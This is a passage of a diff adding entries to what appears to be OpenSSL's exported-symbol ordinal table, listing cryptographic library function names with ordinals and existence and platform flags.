+sk_set                                  1655	EXIST::FUNCTION:
+i2d_ASN1_SET_OF_X509_REVOKED            1661	NOEXIST::FUNCTION:
+sk_sort                                 1671	EXIST::FUNCTION:
+d2i_ASN1_SET_OF_X509_REVOKED            1674	NOEXIST::FUNCTION:
+i2d_ASN1_SET_OF_X509_ALGOR              1682	NOEXIST::FUNCTION:
+i2d_ASN1_SET_OF_X509_CRL                1685	NOEXIST::FUNCTION:
+d2i_ASN1_SET_OF_X509_ALGOR              1696	NOEXIST::FUNCTION:
+d2i_ASN1_SET_OF_X509_CRL                1702	NOEXIST::FUNCTION:
+i2d_ASN1_SET_OF_PKCS7_SIGNER_INFO       1723	NOEXIST::FUNCTION:
+i2d_ASN1_SET_OF_PKCS7_RECIP_INFO        1738	NOEXIST::FUNCTION:
+d2i_ASN1_SET_OF_PKCS7_SIGNER_INFO       1748	NOEXIST::FUNCTION:
+d2i_ASN1_SET_OF_PKCS7_RECIP_INFO        1753	NOEXIST::FUNCTION:
+PKCS5_PBE_add                           1775	EXIST::FUNCTION:
+PEM_write_bio_PKCS8                     1776	EXIST::FUNCTION:
+i2d_PKCS8_fp                            1777	EXIST::FUNCTION:FP_API
+PEM_read_bio_PKCS8_PRIV_KEY_INFO        1778	EXIST:!VMS:FUNCTION:
+PEM_read_bio_P8_PRIV_KEY_INFO           1778	EXIST:VMS:FUNCTION:
+d2i_PKCS8_bio                           1779	EXIST::FUNCTION:BIO
+d2i_PKCS8_PRIV_KEY_INFO_fp              1780	EXIST::FUNCTION:FP_API
+PEM_write_bio_PKCS8_PRIV_KEY_INFO       1781	EXIST:!VMS:FUNCTION:
+PEM_write_bio_P8_PRIV_KEY_INFO          1781	EXIST:VMS:FUNCTION:
+PEM_read_PKCS8                          1782	EXIST:!WIN16:FUNCTION:
+d2i_PKCS8_PRIV_KEY_INFO_bio             1783	EXIST::FUNCTION:BIO
+d2i_PKCS8_fp                            1784	EXIST::FUNCTION:FP_API
+PEM_write_PKCS8                         1785	EXIST:!WIN16:FUNCTION:
+PEM_read_PKCS8_PRIV_KEY_INFO            1786	EXIST:!VMS,!WIN16:FUNCTION:
+PEM_read_P8_PRIV_KEY_INFO               1786	EXIST:VMS:FUNCTION:
+PEM_read_bio_PKCS8                      1787	EXIST::FUNCTION:
+PEM_write_PKCS8_PRIV_KEY_INFO           1788	EXIST:!VMS,!WIN16:FUNCTION:
+PEM_write_P8_PRIV_KEY_INFO              1788	EXIST:VMS:FUNCTION:
+PKCS5_PBE_keyivgen                      1789	EXIST::FUNCTION:
+i2d_PKCS8_bio                           1790	EXIST::FUNCTION:BIO
+i2d_PKCS8_PRIV_KEY_INFO_fp              1791	EXIST::FUNCTION:FP_API
+i2d_PKCS8_PRIV_KEY_INFO_bio             1792	EXIST::FUNCTION:BIO
+BIO_s_bio                               1793	EXIST::FUNCTION:
+PKCS5_pbe2_set                          1794	EXIST::FUNCTION:
+PKCS5_PBKDF2_HMAC_SHA1                  1795	EXIST::FUNCTION:
+PKCS5_v2_PBE_keyivgen                   1796	EXIST::FUNCTION:
+PEM_write_bio_PKCS8PrivateKey           1797	EXIST::FUNCTION:
+PEM_write_PKCS8PrivateKey               1798	EXIST::FUNCTION:
+BIO_ctrl_get_read_request               1799	EXIST::FUNCTION:
+BIO_ctrl_pending                        1800	EXIST::FUNCTION:
+BIO_ctrl_wpending                       1801	EXIST::FUNCTION:
+BIO_new_bio_pair                        1802	EXIST::FUNCTION:
+BIO_ctrl_get_write_guarantee            1803	EXIST::FUNCTION:
+CRYPTO_num_locks                        1804	EXIST::FUNCTION:
+CONF_load_bio                           1805	EXIST::FUNCTION:
+CONF_load_fp                            1806	EXIST::FUNCTION:FP_API
+i2d_ASN1_SET_OF_ASN1_OBJECT             1837	NOEXIST::FUNCTION:
+d2i_ASN1_SET_OF_ASN1_OBJECT             1844	NOEXIST::FUNCTION:
+PKCS7_signatureVerify                   1845	EXIST::FUNCTION:
+RSA_set_method                          1846	EXIST::FUNCTION:RSA
+RSA_get_method                          1847	EXIST::FUNCTION:RSA
+RSA_get_default_method                  1848	EXIST::FUNCTION:RSA
+RSA_check_key                           1869	EXIST::FUNCTION:RSA
+OBJ_obj2txt                             1870	EXIST::FUNCTION:
+DSA_dup_DH                              1871	EXIST::FUNCTION:DH,DSA
+X509_REQ_get_extensions                 1872	EXIST::FUNCTION:
+X509_REQ_set_extension_nids             1873	EXIST::FUNCTION:
+BIO_nwrite                              1874	EXIST::FUNCTION:
+X509_REQ_extension_nid                  1875	EXIST::FUNCTION:
+BIO_nread                               1876	EXIST::FUNCTION:
+X509_REQ_get_extension_nids             1877	EXIST::FUNCTION:
+BIO_nwrite0                             1878	EXIST::FUNCTION:
+X509_REQ_add_extensions_nid             1879	EXIST::FUNCTION:
+BIO_nread0                              1880	EXIST::FUNCTION:
+X509_REQ_add_extensions                 1881	EXIST::FUNCTION:
+BIO_new_mem_buf                         1882	EXIST::FUNCTION:
+DH_set_ex_data                          1883	EXIST::FUNCTION:DH
+DH_set_method                           1884	EXIST::FUNCTION:DH
+DSA_OpenSSL                             1885	EXIST::FUNCTION:DSA
+DH_get_ex_data                          1886	EXIST::FUNCTION:DH
+DH_get_ex_new_index                     1887	EXIST::FUNCTION:DH
+DSA_new_method                          1888	EXIST::FUNCTION:DSA
+DH_new_method                           1889	EXIST::FUNCTION:DH
+DH_OpenSSL                              1890	EXIST::FUNCTION:DH
+DSA_get_ex_new_index                    1891	EXIST::FUNCTION:DSA
+DH_get_default_method                   1892	EXIST::FUNCTION:DH
+DSA_set_ex_data                         1893	EXIST::FUNCTION:DSA
+DH_set_default_method                   1894	EXIST::FUNCTION:DH
+DSA_get_ex_data                         1895	EXIST::FUNCTION:DSA
+X509V3_EXT_REQ_add_conf                 1896	EXIST::FUNCTION:
+NETSCAPE_SPKI_print                     1897	EXIST::FUNCTION:EVP
+NETSCAPE_SPKI_set_pubkey                1898	EXIST::FUNCTION:EVP
+NETSCAPE_SPKI_b64_encode                1899	EXIST::FUNCTION:EVP
+NETSCAPE_SPKI_get_pubkey                1900	EXIST::FUNCTION:EVP
+NETSCAPE_SPKI_b64_decode                1901	EXIST::FUNCTION:EVP
+UTF8_putc                               1902	EXIST::FUNCTION:
+UTF8_getc                               1903	EXIST::FUNCTION:
+RSA_null_method                         1904	EXIST::FUNCTION:RSA
+ASN1_tag2str                            1905	EXIST::FUNCTION:
+BIO_ctrl_reset_read_request             1906	EXIST::FUNCTION:
+DISPLAYTEXT_new                         1907	EXIST::FUNCTION:
+ASN1_GENERALIZEDTIME_free               1908	EXIST::FUNCTION:
+X509_REVOKED_get_ext_d2i                1909	EXIST::FUNCTION:
+X509_set_ex_data                        1910	EXIST::FUNCTION:
+X509_reject_set_bit_asc                 1911	NOEXIST::FUNCTION:
+X509_NAME_add_entry_by_txt              1912	EXIST::FUNCTION:
+X509_NAME_add_entry_by_NID              1914	EXIST::FUNCTION:
+X509_PURPOSE_get0                       1915	EXIST::FUNCTION:
+PEM_read_X509_AUX                       1917	EXIST:!WIN16:FUNCTION:
+d2i_AUTHORITY_INFO_ACCESS               1918	EXIST::FUNCTION:
+PEM_write_PUBKEY                        1921	EXIST:!WIN16:FUNCTION:
+ACCESS_DESCRIPTION_new                  1925	EXIST::FUNCTION:
+X509_CERT_AUX_free                      1926	EXIST::FUNCTION:
+d2i_ACCESS_DESCRIPTION                  1927	EXIST::FUNCTION:
+X509_trust_clear                        1928	EXIST::FUNCTION:
+X509_TRUST_add                          1931	EXIST::FUNCTION:
+ASN1_VISIBLESTRING_new                  1932	EXIST::FUNCTION:
+X509_alias_set1                         1933	EXIST::FUNCTION:
+ASN1_PRINTABLESTRING_free               1934	EXIST::FUNCTION:
+EVP_PKEY_get1_DSA                       1935	EXIST::FUNCTION:DSA
+ASN1_BMPSTRING_new                      1936	EXIST::FUNCTION:
+ASN1_mbstring_copy                      1937	EXIST::FUNCTION:
+ASN1_UTF8STRING_new                     1938	EXIST::FUNCTION:
+DSA_get_default_method                  1941	EXIST::FUNCTION:DSA
+i2d_ASN1_SET_OF_ACCESS_DESCRIPTION      1945	NOEXIST::FUNCTION:
+ASN1_T61STRING_free                     1946	EXIST::FUNCTION:
+DSA_set_method                          1949	EXIST::FUNCTION:DSA
+X509_get_ex_data                        1950	EXIST::FUNCTION:
+ASN1_STRING_type                        1951	EXIST::FUNCTION:
+X509_PURPOSE_get_by_sname               1952	EXIST::FUNCTION:
+ASN1_TIME_free                          1954	EXIST::FUNCTION:
+ASN1_OCTET_STRING_cmp                   1955	EXIST::FUNCTION:
+ASN1_BIT_STRING_new                     1957	EXIST::FUNCTION:
+X509_get_ext_d2i                        1958	EXIST::FUNCTION:
+PEM_read_bio_X509_AUX                   1959	EXIST::FUNCTION:
+ASN1_STRING_set_default_mask_asc        1960	EXIST:!VMS:FUNCTION:
+ASN1_STRING_set_def_mask_asc            1960	EXIST:VMS:FUNCTION:
+PEM_write_bio_RSA_PUBKEY                1961	EXIST::FUNCTION:RSA
+ASN1_INTEGER_cmp                        1963	EXIST::FUNCTION:
+d2i_RSA_PUBKEY_fp                       1964	EXIST::FUNCTION:FP_API,RSA
+X509_trust_set_bit_asc                  1967	NOEXIST::FUNCTION:
+PEM_write_bio_DSA_PUBKEY                1968	EXIST::FUNCTION:DSA
+X509_STORE_CTX_free                     1969	EXIST::FUNCTION:
+EVP_PKEY_set1_DSA                       1970	EXIST::FUNCTION:DSA
+i2d_DSA_PUBKEY_fp                       1971	EXIST::FUNCTION:DSA,FP_API
+X509_load_cert_crl_file                 1972	EXIST::FUNCTION:STDIO
+ASN1_TIME_new                           1973	EXIST::FUNCTION:
+i2d_RSA_PUBKEY                          1974	EXIST::FUNCTION:RSA
+X509_STORE_CTX_purpose_inherit          1976	EXIST::FUNCTION:
+PEM_read_RSA_PUBKEY                     1977	EXIST:!WIN16:FUNCTION:RSA
+d2i_X509_AUX                            1980	EXIST::FUNCTION:
+i2d_DSA_PUBKEY                          1981	EXIST::FUNCTION:DSA
+X509_CERT_AUX_print                     1982	EXIST::FUNCTION:BIO
+PEM_read_DSA_PUBKEY                     1984	EXIST:!WIN16:FUNCTION:DSA
+i2d_RSA_PUBKEY_bio                      1985	EXIST::FUNCTION:BIO,RSA
+ASN1_BIT_STRING_num_asc                 1986	EXIST::FUNCTION:
+i2d_PUBKEY                              1987	EXIST::FUNCTION:
+ASN1_UTCTIME_free                       1988	EXIST::FUNCTION:
+DSA_set_default_method                  1989	EXIST::FUNCTION:DSA
+X509_PURPOSE_get_by_id                  1990	EXIST::FUNCTION:
+ACCESS_DESCRIPTION_free                 1994	EXIST::FUNCTION:
+PEM_read_bio_PUBKEY                     1995	EXIST::FUNCTION:
+ASN1_STRING_set_by_NID                  1996	EXIST::FUNCTION:
+X509_PURPOSE_get_id                     1997	EXIST::FUNCTION:
+DISPLAYTEXT_free                        1998	EXIST::FUNCTION:
+OTHERNAME_new                           1999	EXIST::FUNCTION:
+X509_CERT_AUX_new                       2001	EXIST::FUNCTION:
+X509_TRUST_cleanup                      2007	EXIST::FUNCTION:
+X509_NAME_add_entry_by_OBJ              2008	EXIST::FUNCTION:
+X509_CRL_get_ext_d2i                    2009	EXIST::FUNCTION:
+X509_PURPOSE_get0_name                  2011	EXIST::FUNCTION:
+PEM_read_PUBKEY                         2012	EXIST:!WIN16:FUNCTION:
+i2d_DSA_PUBKEY_bio                      2014	EXIST::FUNCTION:BIO,DSA
+i2d_OTHERNAME                           2015	EXIST::FUNCTION:
+ASN1_OCTET_STRING_free                  2016	EXIST::FUNCTION:
+ASN1_BIT_STRING_set_asc                 2017	EXIST::FUNCTION:
+X509_get_ex_new_index                   2019	EXIST::FUNCTION:
+ASN1_STRING_TABLE_cleanup               2020	EXIST::FUNCTION:
+X509_TRUST_get_by_id                    2021	EXIST::FUNCTION:
+X509_PURPOSE_get_trust                  2022	EXIST::FUNCTION:
+ASN1_STRING_length                      2023	EXIST::FUNCTION:
+d2i_ASN1_SET_OF_ACCESS_DESCRIPTION      2024	NOEXIST::FUNCTION:
+ASN1_PRINTABLESTRING_new                2025	EXIST::FUNCTION:
+X509V3_get_d2i                          2026	EXIST::FUNCTION:
+ASN1_ENUMERATED_free                    2027	EXIST::FUNCTION:
+i2d_X509_CERT_AUX                       2028	EXIST::FUNCTION:
+X509_STORE_CTX_set_trust                2030	EXIST::FUNCTION:
+ASN1_STRING_set_default_mask            2032	EXIST::FUNCTION:
+X509_STORE_CTX_new                      2033	EXIST::FUNCTION:
+EVP_PKEY_get1_RSA                       2034	EXIST::FUNCTION:RSA
+DIRECTORYSTRING_free                    2038	EXIST::FUNCTION:
+PEM_write_X509_AUX                      2039	EXIST:!WIN16:FUNCTION:
+ASN1_OCTET_STRING_set                   2040	EXIST::FUNCTION:
+d2i_DSA_PUBKEY_fp                       2041	EXIST::FUNCTION:DSA,FP_API
+d2i_RSA_PUBKEY                          2044	EXIST::FUNCTION:RSA
+X509_TRUST_get0_name                    2046	EXIST::FUNCTION:
+X509_TRUST_get0                         2047	EXIST::FUNCTION:
+AUTHORITY_INFO_ACCESS_free              2048	EXIST::FUNCTION:
+ASN1_IA5STRING_new                      2049	EXIST::FUNCTION:
+d2i_DSA_PUBKEY                          2050	EXIST::FUNCTION:DSA
+X509_check_purpose                      2051	EXIST::FUNCTION:
+ASN1_ENUMERATED_new                     2052	EXIST::FUNCTION:
+d2i_RSA_PUBKEY_bio                      2053	EXIST::FUNCTION:BIO,RSA
+d2i_PUBKEY                              2054	EXIST::FUNCTION:
+X509_TRUST_get_trust                    2055	EXIST::FUNCTION:
+X509_TRUST_get_flags                    2056	EXIST::FUNCTION:
+ASN1_BMPSTRING_free                     2057	EXIST::FUNCTION:
+ASN1_T61STRING_new                      2058	EXIST::FUNCTION:
+ASN1_UTCTIME_new                        2060	EXIST::FUNCTION:
+i2d_AUTHORITY_INFO_ACCESS               2062	EXIST::FUNCTION:
+EVP_PKEY_set1_RSA                       2063	EXIST::FUNCTION:RSA
+X509_STORE_CTX_set_purpose              2064	EXIST::FUNCTION:
+ASN1_IA5STRING_free                     2065	EXIST::FUNCTION:
+PEM_write_bio_X509_AUX                  2066	EXIST::FUNCTION:
+X509_PURPOSE_get_count                  2067	EXIST::FUNCTION:
+CRYPTO_add_info                         2068	NOEXIST::FUNCTION:
+X509_NAME_ENTRY_create_by_txt           2071	EXIST::FUNCTION:
+ASN1_STRING_get_default_mask            2072	EXIST::FUNCTION:
+X509_alias_get0                         2074	EXIST::FUNCTION:
+ASN1_STRING_data                        2075	EXIST::FUNCTION:
+i2d_ACCESS_DESCRIPTION                  2077	EXIST::FUNCTION:
+X509_trust_set_bit                      2078	NOEXIST::FUNCTION:
+ASN1_BIT_STRING_free                    2080	EXIST::FUNCTION:
+PEM_read_bio_RSA_PUBKEY                 2081	EXIST::FUNCTION:RSA
+X509_add1_reject_object                 2082	EXIST::FUNCTION:
+X509_check_trust                        2083	EXIST::FUNCTION:
+PEM_read_bio_DSA_PUBKEY                 2088	EXIST::FUNCTION:DSA
+X509_PURPOSE_add                        2090	EXIST::FUNCTION:
+ASN1_STRING_TABLE_get                   2091	EXIST::FUNCTION:
+ASN1_UTF8STRING_free                    2092	EXIST::FUNCTION:
+d2i_DSA_PUBKEY_bio                      2093	EXIST::FUNCTION:BIO,DSA
+PEM_write_RSA_PUBKEY                    2095	EXIST:!WIN16:FUNCTION:RSA
+d2i_OTHERNAME                           2096	EXIST::FUNCTION:
+X509_reject_set_bit                     2098	NOEXIST::FUNCTION:
+PEM_write_DSA_PUBKEY                    2101	EXIST:!WIN16:FUNCTION:DSA
+X509_PURPOSE_get0_sname                 2105	EXIST::FUNCTION:
+EVP_PKEY_set1_DH                        2107	EXIST::FUNCTION:DH
+ASN1_OCTET_STRING_dup                   2108	EXIST::FUNCTION:
+ASN1_BIT_STRING_set                     2109	EXIST::FUNCTION:
+X509_TRUST_get_count                    2110	EXIST::FUNCTION:
+ASN1_INTEGER_free                       2111	EXIST::FUNCTION:
+OTHERNAME_free                          2112	EXIST::FUNCTION:
+i2d_RSA_PUBKEY_fp                       2113	EXIST::FUNCTION:FP_API,RSA
+ASN1_INTEGER_dup                        2114	EXIST::FUNCTION:
+d2i_X509_CERT_AUX                       2115	EXIST::FUNCTION:
+PEM_write_bio_PUBKEY                    2117	EXIST::FUNCTION:
+ASN1_VISIBLESTRING_free                 2118	EXIST::FUNCTION:
+X509_PURPOSE_cleanup                    2119	EXIST::FUNCTION:
+ASN1_mbstring_ncopy                     2123	EXIST::FUNCTION:
+ASN1_GENERALIZEDTIME_new                2126	EXIST::FUNCTION:
+EVP_PKEY_get1_DH                        2128	EXIST::FUNCTION:DH
+ASN1_OCTET_STRING_new                   2130	EXIST::FUNCTION:
+ASN1_INTEGER_new                        2131	EXIST::FUNCTION:
+i2d_X509_AUX                            2132	EXIST::FUNCTION:
+ASN1_BIT_STRING_name_print              2134	EXIST::FUNCTION:BIO
+X509_cmp                                2135	EXIST::FUNCTION:
+ASN1_STRING_length_set                  2136	EXIST::FUNCTION:
+DIRECTORYSTRING_new                     2137	EXIST::FUNCTION:
+X509_add1_trust_object                  2140	EXIST::FUNCTION:
+PKCS12_newpass                          2141	EXIST::FUNCTION:
+SMIME_write_PKCS7                       2142	EXIST::FUNCTION:
+SMIME_read_PKCS7                        2143	EXIST::FUNCTION:
+DES_set_key_checked                     2144	EXIST::FUNCTION:DES
+PKCS7_verify                            2145	EXIST::FUNCTION:
+PKCS7_encrypt                           2146	EXIST::FUNCTION:
+DES_set_key_unchecked                   2147	EXIST::FUNCTION:DES
+SMIME_crlf_copy                         2148	EXIST::FUNCTION:
+i2d_ASN1_PRINTABLESTRING                2149	EXIST::FUNCTION:
+PKCS7_get0_signers                      2150	EXIST::FUNCTION:
+PKCS7_decrypt                           2151	EXIST::FUNCTION:
+SMIME_text                              2152	EXIST::FUNCTION:
+PKCS7_simple_smimecap                   2153	EXIST::FUNCTION:
+PKCS7_get_smimecap                      2154	EXIST::FUNCTION:
+PKCS7_sign                              2155	EXIST::FUNCTION:
+PKCS7_add_attrib_smimecap               2156	EXIST::FUNCTION:
+CRYPTO_dbg_set_options                  2157	EXIST::FUNCTION:
+CRYPTO_remove_all_info                  2158	EXIST::FUNCTION:
+CRYPTO_get_mem_debug_functions          2159	EXIST::FUNCTION:
+CRYPTO_is_mem_check_on                  2160	EXIST::FUNCTION:
+CRYPTO_set_mem_debug_functions          2161	EXIST::FUNCTION:
+CRYPTO_pop_info                         2162	EXIST::FUNCTION:
+CRYPTO_push_info_                       2163	EXIST::FUNCTION:
+CRYPTO_set_mem_debug_options            2164	EXIST::FUNCTION:
+PEM_write_PKCS8PrivateKey_nid           2165	EXIST::FUNCTION:
+PEM_write_bio_PKCS8PrivateKey_nid       2166	EXIST:!VMS:FUNCTION:
+PEM_write_bio_PKCS8PrivKey_nid          2166	EXIST:VMS:FUNCTION:
+d2i_PKCS8PrivateKey_bio                 2167	EXIST::FUNCTION:
+ASN1_NULL_free                          2168	EXIST::FUNCTION:
+d2i_ASN1_NULL                           2169	EXIST::FUNCTION:
+ASN1_NULL_new                           2170	EXIST::FUNCTION:
+i2d_PKCS8PrivateKey_bio                 2171	EXIST::FUNCTION:
+i2d_PKCS8PrivateKey_fp                  2172	EXIST::FUNCTION:
+i2d_ASN1_NULL                           2173	EXIST::FUNCTION:
+i2d_PKCS8PrivateKey_nid_fp              2174	EXIST::FUNCTION:
+d2i_PKCS8PrivateKey_fp                  2175	EXIST::FUNCTION:
+i2d_PKCS8PrivateKey_nid_bio             2176	EXIST::FUNCTION:
+i2d_PKCS8PrivateKeyInfo_fp              2177	EXIST::FUNCTION:FP_API
+i2d_PKCS8PrivateKeyInfo_bio             2178	EXIST::FUNCTION:BIO
+PEM_cb                                  2179	NOEXIST::FUNCTION:
+i2d_PrivateKey_fp                       2180	EXIST::FUNCTION:FP_API
+d2i_PrivateKey_bio                      2181	EXIST::FUNCTION:BIO
+d2i_PrivateKey_fp                       2182	EXIST::FUNCTION:FP_API
+i2d_PrivateKey_bio                      2183	EXIST::FUNCTION:BIO
+X509_reject_clear                       2184	EXIST::FUNCTION:
+X509_TRUST_set_default                  2185	EXIST::FUNCTION:
+d2i_AutoPrivateKey                      2186	EXIST::FUNCTION:
+X509_ATTRIBUTE_get0_type                2187	EXIST::FUNCTION:
+X509_ATTRIBUTE_set1_data                2188	EXIST::FUNCTION:
+X509at_get_attr                         2189	EXIST::FUNCTION:
+X509at_get_attr_count                   2190	EXIST::FUNCTION:
+X509_ATTRIBUTE_create_by_NID            2191	EXIST::FUNCTION:
+X509_ATTRIBUTE_set1_object              2192	EXIST::FUNCTION:
+X509_ATTRIBUTE_count                    2193	EXIST::FUNCTION:
+X509_ATTRIBUTE_create_by_OBJ            2194	EXIST::FUNCTION:
+X509_ATTRIBUTE_get0_object              2195	EXIST::FUNCTION:
+X509at_get_attr_by_NID                  2196	EXIST::FUNCTION:
+X509at_add1_attr                        2197	EXIST::FUNCTION:
+X509_ATTRIBUTE_get0_data                2198	EXIST::FUNCTION:
+X509at_delete_attr                      2199	EXIST::FUNCTION:
+X509at_get_attr_by_OBJ                  2200	EXIST::FUNCTION:
+RAND_add                                2201	EXIST::FUNCTION:
+BIO_number_written                      2202	EXIST::FUNCTION:
+BIO_number_read                         2203	EXIST::FUNCTION:
+X509_STORE_CTX_get1_chain               2204	EXIST::FUNCTION:
+ERR_load_RAND_strings                   2205	EXIST::FUNCTION:
+RAND_pseudo_bytes                       2206	EXIST::FUNCTION:
+X509_REQ_get_attr_by_NID                2207	EXIST::FUNCTION:
+X509_REQ_get_attr                       2208	EXIST::FUNCTION:
+X509_REQ_add1_attr_by_NID               2209	EXIST::FUNCTION:
+X509_REQ_get_attr_by_OBJ                2210	EXIST::FUNCTION:
+X509at_add1_attr_by_NID                 2211	EXIST::FUNCTION:
+X509_REQ_add1_attr_by_OBJ               2212	EXIST::FUNCTION:
+X509_REQ_get_attr_count                 2213	EXIST::FUNCTION:
+X509_REQ_add1_attr                      2214	EXIST::FUNCTION:
+X509_REQ_delete_attr                    2215	EXIST::FUNCTION:
+X509at_add1_attr_by_OBJ                 2216	EXIST::FUNCTION:
+X509_REQ_add1_attr_by_txt               2217	EXIST::FUNCTION:
+X509_ATTRIBUTE_create_by_txt            2218	EXIST::FUNCTION:
+X509at_add1_attr_by_txt                 2219	EXIST::FUNCTION:
+BN_pseudo_rand                          2239	EXIST::FUNCTION:
+BN_is_prime_fasttest                    2240	EXIST::FUNCTION:DEPRECATED
+BN_CTX_end                              2241	EXIST::FUNCTION:
+BN_CTX_start                            2242	EXIST::FUNCTION:
+BN_CTX_get                              2243	EXIST::FUNCTION:
+EVP_PKEY2PKCS8_broken                   2244	EXIST::FUNCTION:
+ASN1_STRING_TABLE_add                   2245	EXIST::FUNCTION:
+CRYPTO_dbg_get_options                  2246	EXIST::FUNCTION:
+AUTHORITY_INFO_ACCESS_new               2247	EXIST::FUNCTION:
+CRYPTO_get_mem_debug_options            2248	EXIST::FUNCTION:
+DES_crypt                               2249	EXIST::FUNCTION:DES
+PEM_write_bio_X509_REQ_NEW              2250	EXIST::FUNCTION:
+PEM_write_X509_REQ_NEW                  2251	EXIST:!WIN16:FUNCTION:
+BIO_callback_ctrl                       2252	EXIST::FUNCTION:
+RAND_egd                                2253	EXIST::FUNCTION:
+RAND_status                             2254	EXIST::FUNCTION:
+bn_dump1                                2255	NOEXIST::FUNCTION:
+DES_check_key_parity                    2256	EXIST::FUNCTION:DES
+lh_num_items                            2257	EXIST::FUNCTION:
+RAND_event                              2258	EXIST:WIN32:FUNCTION:
+DSO_new                                 2259	EXIST::FUNCTION:
+DSO_new_method                          2260	EXIST::FUNCTION:
+DSO_free                                2261	EXIST::FUNCTION:
+DSO_flags                               2262	EXIST::FUNCTION:
+DSO_up                                  2263	NOEXIST::FUNCTION:
+DSO_set_default_method                  2264	EXIST::FUNCTION:
+DSO_get_default_method                  2265	EXIST::FUNCTION:
+DSO_get_method                          2266	EXIST::FUNCTION:
+DSO_set_method                          2267	EXIST::FUNCTION:
+DSO_load                                2268	EXIST::FUNCTION:
+DSO_bind_var                            2269	EXIST::FUNCTION:
+DSO_METHOD_null                         2270	EXIST::FUNCTION:
+DSO_METHOD_openssl                      2271	EXIST::FUNCTION:
+DSO_METHOD_dlfcn                        2272	EXIST::FUNCTION:
+DSO_METHOD_win32                        2273	EXIST::FUNCTION:
+ERR_load_DSO_strings                    2274	EXIST::FUNCTION:
+DSO_METHOD_dl                           2275	EXIST::FUNCTION:
+NCONF_load                              2276	EXIST::FUNCTION:
+NCONF_load_fp                           2278	EXIST::FUNCTION:FP_API
+NCONF_new                               2279	EXIST::FUNCTION:
+NCONF_get_string                        2280	EXIST::FUNCTION:
+NCONF_free                              2281	EXIST::FUNCTION:
+NCONF_get_number                        2282	NOEXIST::FUNCTION:
+CONF_dump_fp                            2283	EXIST::FUNCTION:
+NCONF_load_bio                          2284	EXIST::FUNCTION:
+NCONF_dump_fp                           2285	EXIST::FUNCTION:
+NCONF_get_section                       2286	EXIST::FUNCTION:
+NCONF_dump_bio                          2287	EXIST::FUNCTION:
+CONF_dump_bio                           2288	EXIST::FUNCTION:
+NCONF_free_data                         2289	EXIST::FUNCTION:
+CONF_set_default_method                 2290	EXIST::FUNCTION:
+ERR_error_string_n                      2291	EXIST::FUNCTION:
+BIO_snprintf                            2292	EXIST::FUNCTION:
+DSO_ctrl                                2293	EXIST::FUNCTION:
+i2d_ASN1_SET_OF_ASN1_INTEGER            2317	NOEXIST::FUNCTION:
+i2d_ASN1_SET_OF_PKCS12_SAFEBAG          2320	NOEXIST::FUNCTION:
+i2d_ASN1_SET_OF_PKCS7                   2328	NOEXIST::FUNCTION:
+BIO_vfree                               2334	EXIST::FUNCTION:
+d2i_ASN1_SET_OF_ASN1_INTEGER            2339	NOEXIST::FUNCTION:
+d2i_ASN1_SET_OF_PKCS12_SAFEBAG          2341	NOEXIST::FUNCTION:
+ASN1_UTCTIME_get                        2350	NOEXIST::FUNCTION:
+X509_REQ_digest                         2362	EXIST::FUNCTION:EVP
+X509_CRL_digest                         2391	EXIST::FUNCTION:EVP
+d2i_ASN1_SET_OF_PKCS7                   2397	NOEXIST::FUNCTION:
+X509_ALGOR_cmp                          2398	EXIST::FUNCTION:
+EVP_CIPHER_CTX_set_key_length           2399	EXIST::FUNCTION:
+EVP_CIPHER_CTX_ctrl                     2400	EXIST::FUNCTION:
+BN_mod_exp_mont_word                    2401	EXIST::FUNCTION:
+RAND_egd_bytes                          2402	EXIST::FUNCTION:
+X509_REQ_get1_email                     2403	EXIST::FUNCTION:
+X509_get1_email                         2404	EXIST::FUNCTION:
+X509_email_free                         2405	EXIST::FUNCTION:
+i2d_RSA_NET                             2406	EXIST::FUNCTION:RC4,RSA
+d2i_RSA_NET_2                           2407	NOEXIST::FUNCTION:
+d2i_RSA_NET                             2408	EXIST::FUNCTION:RC4,RSA
+DSO_bind_func                           2409	EXIST::FUNCTION:
+CRYPTO_get_new_dynlockid                2410	EXIST::FUNCTION:
+sk_new_null                             2411	EXIST::FUNCTION:
+CRYPTO_set_dynlock_destroy_callback     2412	EXIST:!VMS:FUNCTION:
+CRYPTO_set_dynlock_destroy_cb           2412	EXIST:VMS:FUNCTION:
+CRYPTO_destroy_dynlockid                2413	EXIST::FUNCTION:
+CRYPTO_set_dynlock_size                 2414	NOEXIST::FUNCTION:
+CRYPTO_set_dynlock_create_callback      2415	EXIST:!VMS:FUNCTION:
+CRYPTO_set_dynlock_create_cb            2415	EXIST:VMS:FUNCTION:
+CRYPTO_set_dynlock_lock_callback        2416	EXIST:!VMS:FUNCTION:
+CRYPTO_set_dynlock_lock_cb              2416	EXIST:VMS:FUNCTION:
+CRYPTO_get_dynlock_lock_callback        2417	EXIST:!VMS:FUNCTION:
+CRYPTO_get_dynlock_lock_cb              2417	EXIST:VMS:FUNCTION:
+CRYPTO_get_dynlock_destroy_callback     2418	EXIST:!VMS:FUNCTION:
+CRYPTO_get_dynlock_destroy_cb           2418	EXIST:VMS:FUNCTION:
+CRYPTO_get_dynlock_value                2419	EXIST::FUNCTION:
+CRYPTO_get_dynlock_create_callback      2420	EXIST:!VMS:FUNCTION:
+CRYPTO_get_dynlock_create_cb            2420	EXIST:VMS:FUNCTION:
+c2i_ASN1_BIT_STRING                     2421	EXIST::FUNCTION:
+i2c_ASN1_BIT_STRING                     2422	EXIST::FUNCTION:
+RAND_poll                               2423	EXIST::FUNCTION:
+c2i_ASN1_INTEGER                        2424	EXIST::FUNCTION:
+i2c_ASN1_INTEGER                        2425	EXIST::FUNCTION:
+BIO_dump_indent                         2426	EXIST::FUNCTION:
+ASN1_parse_dump                         2427	EXIST::FUNCTION:BIO
+c2i_ASN1_OBJECT                         2428	EXIST::FUNCTION:
+X509_NAME_print_ex_fp                   2429	EXIST::FUNCTION:FP_API
+ASN1_STRING_print_ex_fp                 2430	EXIST::FUNCTION:FP_API
+X509_NAME_print_ex                      2431	EXIST::FUNCTION:BIO
+ASN1_STRING_print_ex                    2432	EXIST::FUNCTION:BIO
+MD4                                     2433	EXIST::FUNCTION:MD4
+MD4_Transform                           2434	EXIST::FUNCTION:MD4
+MD4_Final                               2435	EXIST::FUNCTION:MD4
+MD4_Update                              2436	EXIST::FUNCTION:MD4
+MD4_Init                                2437	EXIST::FUNCTION:MD4
+EVP_md4                                 2438	EXIST::FUNCTION:MD4
+i2d_PUBKEY_bio                          2439	EXIST::FUNCTION:BIO
+i2d_PUBKEY_fp                           2440	EXIST::FUNCTION:FP_API
+d2i_PUBKEY_bio                          2441	EXIST::FUNCTION:BIO
+ASN1_STRING_to_UTF8                     2442	EXIST::FUNCTION:
